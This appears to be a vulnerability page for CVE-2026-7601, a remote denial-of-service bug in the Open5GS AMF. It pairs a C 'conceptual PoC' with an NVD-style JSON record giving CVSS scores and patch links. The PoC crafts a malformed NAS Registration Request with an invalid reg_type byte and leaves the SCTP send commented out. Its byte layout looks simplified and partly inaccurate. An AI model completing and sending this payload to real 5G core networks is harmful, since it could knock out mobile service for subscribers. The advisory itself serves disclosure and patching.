CVE-2026-7601

/* * Conceptual PoC for CVE-2026-7601 * Demonstrates how to craft a malformed NAS Registration Request * targeting the Open5GS AMF 'reg_type' parameter. * Note: This requires a valid SCTP association with the AMF in a real scenario. */ #include <stdio.h> #include <string.h> #include <stdint.h> // Simplified NAS PDU structure for demonstration void craft_malformed_nas(uint8_t *buffer, size_t *len) { // NAS Security Header (Plain) buffer[0] = 0x7e; // Registration Request message type buffer[1] = 0x00; // Manipulating the 'reg_type' argument (usually at offset 2 or specific protocol location) // Setting an unexpected value to trigger the parsing logic error buffer[2] = 0xFF; // Malicious reg_type value // Fill with dummy data to simulate packet length memset(buffer + 3, 0x41, 20); *len = 23; } int main() { uint8_t payload[1024]; size_t payload_len; printf("[*] Crafting PoC payload for CVE-2026-7601...\n"); craft_malformed_nas(payload, &payload_len); printf("[*] Payload generated (Length: %zu bytes)\n", payload_len); printf("[*] Malicious reg_type value: 0x%02X\n", payload[2]); // In a real exploit, this payload would be sent over SCTP to the AMF port (e.g., 38412) // sendto(sctp_socket, payload, payload_len, 0, (struct sockaddr *)&amf_addr, addr_len); printf("[!] If sent to a vulnerable Open5GS AMF (< 2.7.7), this should cause a crash (DoS).\n"); return 0; }

{"cve": {"id": "CVE-2026-7601", "sourceIdentifier": "[email protected]", "published": "2026-05-02T03:15:59.997", "lastModified": "2026-05-05T19:17:22.860", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Open5GS up to 2.7.6. Affected is an unknown function of the file src/amf/gmm-handler.c of the component AMF. The manipulation of the argument reg_type leads to denial of service. The attack is possible to be carried out remotely. Upgrading to version 2.7.7 is able to address this issue. The identifier of the patch is ebc66942b6f8f1fab2d640e71cf4e9f1a423b426. It is advisable to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/ebc66942b6f8f1fab2d640e71cf4e9f1a423b426", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/4321", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/releases/tag/v2.7.7", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/805675", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360558", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360558/cti", "source": "[email protected]"}]}}